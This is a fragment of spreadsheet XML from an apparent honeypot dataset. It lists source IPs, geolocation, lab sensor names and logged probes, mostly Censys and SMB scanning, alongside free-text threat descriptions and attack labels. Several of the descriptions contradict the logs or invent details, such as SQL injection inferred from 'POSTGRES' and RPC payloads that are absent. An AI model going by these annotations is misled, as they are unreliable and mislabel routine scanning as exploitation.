    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,58542)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,8713)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,61491)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,62211)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,56947)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,8194)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,51130)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,52078)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,52213)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53415)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49419)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,50582)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,59201)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,59568)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,55193)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,55880)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,34504)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,1938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53035)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,65369)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49474)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,65453)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49854)}</t>
  </si>
  <si>
    <t>::ffff:67a6:8841</t>
  </si>
  <si>
    <t>A suspicious incoming SMB connection has been detected from IP address 103.166.136.65 on an unknown port 65453. This could be a malicious attempt to access or exploit the system's file sharing services. Further investigation is needed to determine the nature of this activity. &amp;&amp; Possible malicious activity detected - incoming SMB connection from a suspicious IP address attempting to establish unauthorized access to system resources. This may indicate an attempt at file sharing or data theft. Further investigation is needed to determine the intent behind this action. &amp;&amp; A possible malicious activity is an unknown remote client attempting to initiate a connection to a service on the system. This could be indicative of a potential scanning or probing attempt. The IP address 103.166.136.65 may be involved in unauthorized access attempts. &amp;&amp; An incoming SMB connection from an IP address is detected, potentially indicating a malicious attempt to access or exploit a shared resource on the system. This could be a reconnaissance activity or a prelude to further attacks. The suspicious IP address may be attempting to establish unauthorized access.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Scan &amp;&amp; SMB Brute</t>
  </si>
  <si>
    <t>4cc8cdbb89ef1858bcc183a5efdd1c2d</t>
  </si>
  <si>
    <t>122.171.22.22</t>
  </si>
  <si>
    <t>Bidar</t>
  </si>
  <si>
    <t>Homnābād</t>
  </si>
  <si>
    <t>1269979</t>
  </si>
  <si>
    <t>17.7707</t>
  </si>
  <si>
    <t>77.1252</t>
  </si>
  <si>
    <t>::ffff:7aab:1616</t>
  </si>
  <si>
    <t>f45a08b989bdfb13b8f2c1f5401e21a9</t>
  </si>
  <si>
    <t>162.142.125.47</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_IRC_H5&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_IRC_H41&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IPP_H3&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_RDP_H8&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_LDAP_H20&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_IRC_H36&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_POP3_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;143&amp;&amp;5432&amp;&amp;1521&amp;&amp;631&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;389&amp;&amp;110&amp;&amp;3389&amp;&amp;6667&amp;&amp;25&amp;&amp;3306&amp;&amp;21917&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;NA&amp;&amp;59550&amp;&amp;59564&amp;&amp;9100&amp;&amp;80&amp;&amp;58350&amp;&amp;58340&amp;&amp;21&amp;&amp;58552&amp;&amp;58560&amp;&amp;58428&amp;&amp;58422&amp;&amp;41334&amp;&amp;41320&amp;&amp;41314&amp;&amp;48240&amp;&amp;35536&amp;&amp;36950&amp;&amp;39534&amp;&amp;47538</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}</t>
  </si>
  <si>
    <t>2020-06-12</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;login&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;query&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=57516'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.118.77:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.118.77:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=54896'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=39691'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=48658'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.47,46012)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.43.207:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.43.207:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=45437'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=53607'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.116.162:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=54535'}}&amp;&amp;{Data_HTTPS:{'Host': '38.54.117.64:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.4.48.242:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:{'command': '*IDN?', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=50513'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=58154'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 156.244.8.69:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.113.33:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'l x0b         '}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=58239'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.138.110:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}</t>
  </si>
  <si>
    <t>::ffff:a28e:7d2f</t>
  </si>
  <si>
    <t>There is no log data provided for analysis. &amp;&amp; A POST request is sent from IP address 5.253.43.207 to a server that appears to be an IPP printer service, with potentially malicious software (CensysInspect) attempting to scan or exploit the service. The large content length of 145 suggests a potential file transfer or data exfiltration attempt. This could indicate reconnaissance or exploitation activity. &amp;&amp; Possible attempted SQL injection or unauthorized database access attempt, as the presence of "POSTGRES" suggests a targeted attack on a PostgreSQL database. &amp;&amp; This log indicates an attempt to access a sensitive area of the system, suggesting a potential unauthorized probing or reconnaissance activity.
A malicious actor may be trying to gather information about the system's configuration and security settings.
Further investigation is needed to determine the intent behind this action. &amp;&amp; Possible malicious activity is an attempt to gather printer information, likely for reconnaissance or exploitation purposes. The attacker is trying to extract system details from the targeted device. This could be a precursor to further attacks or malicious actions. &amp;&amp; This data suggests an attempt to send a malicious request to a vulnerable service, attempting to exploit it for nefarious purposes, using a potentially disguised user agent. The user agent may be spoofed to appear legitimate. This could be a reconnaissance or exploitation attempt. &amp;&amp; An attacker is attempting to exploit a web service by sending a POST request with malicious JSON data containing RPC commands, likely to inject and execute arbitrary code. The request originates from an IP address that has been used for other malicious activities in the past. The User-Agent header suggests it's being done using a tool designed for vulnerability scanning or exploitation. &amp;&amp; This indicates an attempt to access a PostgreSQL database. The activity appears to be reconnaissance or probing for potential vulnerabilities. The result is that no specific information was retrieved regarding the target database. &amp;&amp; The data suggests an attempted login attempt to an email service, possibly using brute force or guessing the password of a legitimate account. This could be a sign of a malicious actor trying to gain unauthorized access to sensitive information. The IMAP protocol is commonly used for accessing email accounts remotely. &amp;&amp; A POST request is being sent to the /ipp endpoint on a device, likely attempting unauthorized printing or scanning. This could be part of a larger attack aimed at exploiting vulnerable printer software. The user agent suggests this might be related to reconnaissance activities. &amp;&amp; Possible malicious activity involves unauthorized printing or scanning, potentially originating from a compromised device, with suspicious user agent and encoding parameters suggesting potential exploit attempts. The presence of a POST request to the IPP endpoint suggests an attempt to send a print job. The IP address 193.57.138.110 is likely involved in this activity. &amp;&amp; A potential authentication attempt is being made using TLS encryption. This could be a legitimate action or an attempt to disguise malicious activity. The user may be trying to establish a secure connection for unauthorized access. &amp;&amp; An attacker is attempting to establish a secure connection using TLS, likely as a precursor to unauthorized FTP access or data transfer. This could be an initial step in exploiting the service for malicious purposes such as uploading malware or stealing sensitive information. The attacker's goal may be to bypass security measures and gain unauthorized access to the system. &amp;&amp; An attempt was made to authenticate using SSL encryption for an FTP connection, which could be a step towards establishing a secure malicious tunnel. This suggests potential nefarious activity related to exploiting encryption mechanisms for unauthorized access. The goal might be to establish a secure backdoor for further malicious activities. &amp;&amp; A malicious user is attempting to use SSL encryption for FTP authentication, which may indicate an attempt to bypass security measures or hide their activities. They are using the AUTH command to initiate the authentication process over an encrypted connection. This could be a sign of a sophisticated attack.</t>
  </si>
  <si>
    <t>PortScan &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Printer Jetter &amp;&amp; SQL Injection &amp;&amp; TLS Attack &amp;&amp; SSL Attack</t>
  </si>
  <si>
    <t>98298a16fa1b49a8a00939efce2517a9</t>
  </si>
  <si>
    <t>103.103.133.164</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>Tapi</t>
  </si>
  <si>
    <t>Vyāra (Old Bus Stand)</t>
  </si>
  <si>
    <t>1253074</t>
  </si>
  <si>
    <t>21.1106</t>
  </si>
  <si>
    <t>73.3897</t>
  </si>
  <si>
    <t>45117</t>
  </si>
  <si>
    <t>Ishan's Network</t>
  </si>
  <si>
    <t>Pal Digital Networking Pvt. Ltd.</t>
  </si>
  <si>
    <t>2017-11-06</t>
  </si>
  <si>
    <t>INPL-IN</t>
  </si>
  <si>
    <t>::ffff:6767:85a4</t>
  </si>
  <si>
    <t>932d73b5abacb9294c2812238c2de18f</t>
  </si>
  <si>
    <t>117.207.253.131</t>
  </si>
  <si>
    <t>::ffff:75cf:fd83</t>
  </si>
  <si>
